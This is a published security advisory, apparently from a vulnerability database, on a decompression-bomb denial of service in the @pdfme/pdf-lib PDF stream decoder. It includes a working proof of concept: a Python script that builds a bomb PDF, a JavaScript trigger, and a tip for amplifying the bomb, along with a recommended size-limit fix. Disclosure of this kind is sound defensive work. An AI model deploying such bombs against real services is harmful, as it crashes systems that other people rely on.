GHSA-VRQM-GVQ7-RRWH
Vulnerability from github – Published: 2026-03-20 20:44 – Updated: 2026-03-20 20:44Summary
The DecodeStream.ensureBuffer() method in @pdfme/pdf-lib doubles its internal buffer without any upper bound on the decompressed size. A crafted PDF containing a FlateDecode stream with a high compression ratio (decompression bomb) causes unbounded memory allocation during stream decoding, leading to memory exhaustion and denial of service in both server-side (generator) and client-side (UI) contexts.
Details
The vulnerability exists in the DecodeStream class, which is the base class for all stream decoders including FlateStream (DEFLATE/zlib decompression).
Unbounded buffer growth in ensureBuffer() — packages/pdf-lib/src/core/streams/DecodeStream.ts:148-160:
protected ensureBuffer(requested: number) {
const buffer = this.buffer;
if (requested <= buffer.byteLength) {
return buffer;
}
let size = this.minBufferLength;
while (size < requested) {
size *= 2; // Doubles with no upper bound
}
const buffer2 = new Uint8Array(size); // Allocates without limit
buffer2.set(buffer);
return (this.buffer = buffer2);
}
The size *= 2 loop has no maximum size check. The buffer will continue doubling until the process runs out of memory.
Unconditional full decompression in decode() — DecodeStream.ts:139-141:
decode(): Uint8Array {
while (!this.eof) this.readBlock(); // Fully decompresses before returning
return this.buffer.subarray(0, this.bufferLength);
}
FlateStream.readBlock() calls ensureBuffer() repeatedly during decompression — packages/pdf-lib/src/core/streams/FlateStream.ts:272-274:
if (pos + 1 >= limit) {
buffer = this.ensureBuffer(pos + 1);
limit = buffer.length;
}
And again at line 297-300:
if (pos + len >= limit) {
buffer = this.ensureBuffer(pos + len);
limit = buffer.length;
}
Entry point via basePdf — packages/generator/src/helper.ts:42-43:
const willLoadPdf = await getB64BasePdf(basePdf);
const embedPdf = await PDFDocument.load(willLoadPdf);
The basePdf parameter accepts base64-encoded data, a URL, or raw bytes. When PDFDocument.load() parses the PDF, it encounters FlateDecode streams and decompresses them through FlateStream → DecodeStream with no size limits.
The same code path exists in the UI package at packages/ui/src/helper.ts:292 and packages/ui/src/hooks.ts:67.
PoC
Step 1: Create a decompression bomb PDF
#!/usr/bin/env python3
"""Generate a PDF decompression bomb for PoC."""
import zlib
import struct
# Create highly compressible data: 100MB of null bytes
# compresses to ~100KB (~1000:1 ratio)
uncompressed = b'\x00' * (100 * 1024 * 1024) # 100 MB
compressed = zlib.compress(uncompressed, 9)
# Minimal PDF structure with FlateDecode stream
pdf = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]
/Contents 4 0 R >>
endobj
4 0 obj
<< /Filter /FlateDecode /Length """ + str(len(compressed)).encode() + b""" >>
stream
""" + compressed + b"""
endstream
endobj
xref
0 5
"""
# Write proper xref (simplified for PoC)
with open("bomb.pdf", "wb") as f:
f.write(pdf)
f.write(b"trailer << /Size 5 /Root 1 0 R >>\nstartxref\n0\n%%EOF\n")
print(f"Compressed size: {len(compressed)} bytes")
print(f"Decompressed size: {len(uncompressed)} bytes")
print(f"Ratio: {len(uncompressed)/len(compressed):.0f}:1")
Step 2: Trigger via @pdfme/generator
const { generate } = require('@pdfme/generator');
const fs = require('fs');
const bombPdf = fs.readFileSync('bomb.pdf');
// This will cause unbounded memory allocation during PDF parsing
generate({
template: {
basePdf: bombPdf, // Attacker-controlled input
schemas: [[]],
},
inputs: [{}],
plugins: {},
}).catch(err => console.error('OOM or crash:', err.message));
Step 3: Observe memory exhaustion
# Monitor memory usage — the Node.js process will consume all available memory
# and either crash with a heap allocation failure or be OOM-killed
node --max-old-space-size=512 trigger.js
# Expected: "FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory"
For higher amplification (e.g., 10GB decompressed from ~10MB compressed), nest multiple FlateDecode layers or use a larger null-byte payload.
Impact
- Denial of Service: Any application using
@pdfme/generatoror@pdfme/uithat allows users to supply PDF templates is vulnerable to memory exhaustion. A single crafted PDF can crash the Node.js process or freeze the browser tab. - Server-side impact: In server-side PDF generation pipelines, this can take down the entire service. The ~1000:1 amplification ratio means a ~100KB upload can force allocation of ~100MB+ of memory, and larger ratios are achievable.
- Client-side impact: In browser-based usage (Designer/Form/Viewer components), loading a malicious template freezes the tab and may crash the browser process.
- No authentication bypass needed: The attack only requires the ability to supply a
basePdfvalue, which is the standard template input parameter — no elevated privileges are needed.
Recommended Fix
Add a maximum decoded size limit to ensureBuffer() in packages/pdf-lib/src/core/streams/DecodeStream.ts:
const MAX_DECODED_SIZE = 100 * 1024 * 1024; // 100 MB
class DecodeStream implements StreamType {
// ... existing fields ...
protected ensureBuffer(requested: number) {
const buffer = this.buffer;
if (requested <= buffer.byteLength) {
return buffer;
}
if (requested > MAX_DECODED_SIZE) {
throw new Error(
`Decoded stream size ${requested} exceeds maximum allowed size ${MAX_DECODED_SIZE}. ` +
`This may indicate a decompression bomb.`
);
}
let size = this.minBufferLength;
while (size < requested) {
size *= 2;
}
// Cap the allocation even if the doubling overshoots
if (size > MAX_DECODED_SIZE) {
size = MAX_DECODED_SIZE;
}
const buffer2 = new Uint8Array(size);
buffer2.set(buffer);
return (this.buffer = buffer2);
}
}
Optionally, expose the limit via PDFDocument.load() options so consumers can tune it:
// In LoadOptions interface:
interface LoadOptions {
// ... existing options ...
maxDecodedStreamSize?: number; // Default: 100 MB
}
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.5.9"
},
"package": {
"ecosystem": "npm",
"name": "@pdfme/pdf-lib"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.5.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-409"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-20T20:44:52Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\nThe `DecodeStream.ensureBuffer()` method in `@pdfme/pdf-lib` doubles its internal buffer without any upper bound on the decompressed size. A crafted PDF containing a FlateDecode stream with a high compression ratio (decompression bomb) causes unbounded memory allocation during stream decoding, leading to memory exhaustion and denial of service in both server-side (generator) and client-side (UI) contexts.\n\n## Details\n\nThe vulnerability exists in the `DecodeStream` class, which is the base class for all stream decoders including `FlateStream` (DEFLATE/zlib decompression).\n\n**Unbounded buffer growth in `ensureBuffer()`** \u2014 `packages/pdf-lib/src/core/streams/DecodeStream.ts:148-160`:\n\n```typescript\nprotected ensureBuffer(requested: number) {\n const buffer = this.buffer;\n if (requested \u003c= buffer.byteLength) {\n return buffer;\n }\n let size = this.minBufferLength;\n while (size \u003c requested) {\n size *= 2; // Doubles with no upper bound\n }\n const buffer2 = new Uint8Array(size); // Allocates without limit\n buffer2.set(buffer);\n return (this.buffer = buffer2);\n}\n```\n\nThe `size *= 2` loop has no maximum size check. The buffer will continue doubling until the process runs out of memory.\n\n**Unconditional full decompression in `decode()`** \u2014 `DecodeStream.ts:139-141`:\n\n```typescript\ndecode(): Uint8Array {\n while (!this.eof) this.readBlock(); // Fully decompresses before returning\n return this.buffer.subarray(0, this.bufferLength);\n}\n```\n\n**`FlateStream.readBlock()`** calls `ensureBuffer()` repeatedly during decompression \u2014 `packages/pdf-lib/src/core/streams/FlateStream.ts:272-274`:\n\n```typescript\nif (pos + 1 \u003e= limit) {\n buffer = this.ensureBuffer(pos + 1);\n limit = buffer.length;\n}\n```\n\nAnd again at line 297-300:\n\n```typescript\nif (pos + len \u003e= limit) {\n buffer = this.ensureBuffer(pos + len);\n limit = buffer.length;\n}\n```\n\n**Entry point via `basePdf`** \u2014 `packages/generator/src/helper.ts:42-43`:\n\n```typescript\nconst willLoadPdf = await getB64BasePdf(basePdf);\nconst embedPdf = await PDFDocument.load(willLoadPdf);\n```\n\nThe `basePdf` parameter accepts base64-encoded data, a URL, or raw bytes. When `PDFDocument.load()` parses the PDF, it encounters FlateDecode streams and decompresses them through `FlateStream` \u2192 `DecodeStream` with no size limits.\n\nThe same code path exists in the UI package at `packages/ui/src/helper.ts:292` and `packages/ui/src/hooks.ts:67`.\n\n## PoC\n\n**Step 1: Create a decompression bomb PDF**\n\n```python\n#!/usr/bin/env python3\n\"\"\"Generate a PDF decompression bomb for PoC.\"\"\"\nimport zlib\nimport struct\n\n# Create highly compressible data: 100MB of null bytes\n# compresses to ~100KB (~1000:1 ratio)\nuncompressed = b\u0027\\x00\u0027 * (100 * 1024 * 1024) # 100 MB\ncompressed = zlib.compress(uncompressed, 9)\n\n# Minimal PDF structure with FlateDecode stream\npdf = b\"\"\"%PDF-1.4\n1 0 obj\n\u003c\u003c /Type /Catalog /Pages 2 0 R \u003e\u003e\nendobj\n\n2 0 obj\n\u003c\u003c /Type /Pages /Kids [3 0 R] /Count 1 \u003e\u003e\nendobj\n\n3 0 obj\n\u003c\u003c /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]\n /Contents 4 0 R \u003e\u003e\nendobj\n\n4 0 obj\n\u003c\u003c /Filter /FlateDecode /Length \"\"\" + str(len(compressed)).encode() + b\"\"\" \u003e\u003e\nstream\n\"\"\" + compressed + b\"\"\"\nendstream\nendobj\n\nxref\n0 5\n\"\"\"\n# Write proper xref (simplified for PoC)\nwith open(\"bomb.pdf\", \"wb\") as f:\n f.write(pdf)\n f.write(b\"trailer \u003c\u003c /Size 5 /Root 1 0 R \u003e\u003e\\nstartxref\\n0\\n%%EOF\\n\")\n\nprint(f\"Compressed size: {len(compressed)} bytes\")\nprint(f\"Decompressed size: {len(uncompressed)} bytes\")\nprint(f\"Ratio: {len(uncompressed)/len(compressed):.0f}:1\")\n```\n\n**Step 2: Trigger via @pdfme/generator**\n\n```javascript\nconst { generate } = require(\u0027@pdfme/generator\u0027);\nconst fs = require(\u0027fs\u0027);\n\nconst bombPdf = fs.readFileSync(\u0027bomb.pdf\u0027);\n\n// This will cause unbounded memory allocation during PDF parsing\ngenerate({\n template: {\n basePdf: bombPdf, // Attacker-controlled input\n schemas: [[]],\n },\n inputs: [{}],\n plugins: {},\n}).catch(err =\u003e console.error(\u0027OOM or crash:\u0027, err.message));\n```\n\n**Step 3: Observe memory exhaustion**\n\n```bash\n# Monitor memory usage \u2014 the Node.js process will consume all available memory\n# and either crash with a heap allocation failure or be OOM-killed\nnode --max-old-space-size=512 trigger.js\n# Expected: \"FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory\"\n```\n\nFor higher amplification (e.g., 10GB decompressed from ~10MB compressed), nest multiple FlateDecode layers or use a larger null-byte payload.\n\n## Impact\n\n- **Denial of Service**: Any application using `@pdfme/generator` or `@pdfme/ui` that allows users to supply PDF templates is vulnerable to memory exhaustion. A single crafted PDF can crash the Node.js process or freeze the browser tab.\n- **Server-side impact**: In server-side PDF generation pipelines, this can take down the entire service. The ~1000:1 amplification ratio means a ~100KB upload can force allocation of ~100MB+ of memory, and larger ratios are achievable.\n- **Client-side impact**: In browser-based usage (Designer/Form/Viewer components), loading a malicious template freezes the tab and may crash the browser process.\n- **No authentication bypass needed**: The attack only requires the ability to supply a `basePdf` value, which is the standard template input parameter \u2014 no elevated privileges are needed.\n\n## Recommended Fix\n\nAdd a maximum decoded size limit to `ensureBuffer()` in `packages/pdf-lib/src/core/streams/DecodeStream.ts`:\n\n```typescript\nconst MAX_DECODED_SIZE = 100 * 1024 * 1024; // 100 MB\n\nclass DecodeStream implements StreamType {\n // ... existing fields ...\n\n protected ensureBuffer(requested: number) {\n const buffer = this.buffer;\n if (requested \u003c= buffer.byteLength) {\n return buffer;\n }\n\n if (requested \u003e MAX_DECODED_SIZE) {\n throw new Error(\n `Decoded stream size ${requested} exceeds maximum allowed size ${MAX_DECODED_SIZE}. ` +\n `This may indicate a decompression bomb.`\n );\n }\n\n let size = this.minBufferLength;\n while (size \u003c requested) {\n size *= 2;\n }\n\n // Cap the allocation even if the doubling overshoots\n if (size \u003e MAX_DECODED_SIZE) {\n size = MAX_DECODED_SIZE;\n }\n\n const buffer2 = new Uint8Array(size);\n buffer2.set(buffer);\n return (this.buffer = buffer2);\n }\n}\n```\n\nOptionally, expose the limit via `PDFDocument.load()` options so consumers can tune it:\n\n```typescript\n// In LoadOptions interface:\ninterface LoadOptions {\n // ... existing options ...\n maxDecodedStreamSize?: number; // Default: 100 MB\n}\n```",
"id": "GHSA-vrqm-gvq7-rrwh",
"modified": "2026-03-20T20:44:52Z",
"published": "2026-03-20T20:44:52Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pdfme/pdfme/security/advisories/GHSA-vrqm-gvq7-rrwh"
},
{
"type": "PACKAGE",
"url": "https://github.com/pdfme/pdfme"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "PDFME Affected by Decompression Bomb in FlateDecode Stream Parsing Causes Memory Exhaustion DoS"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.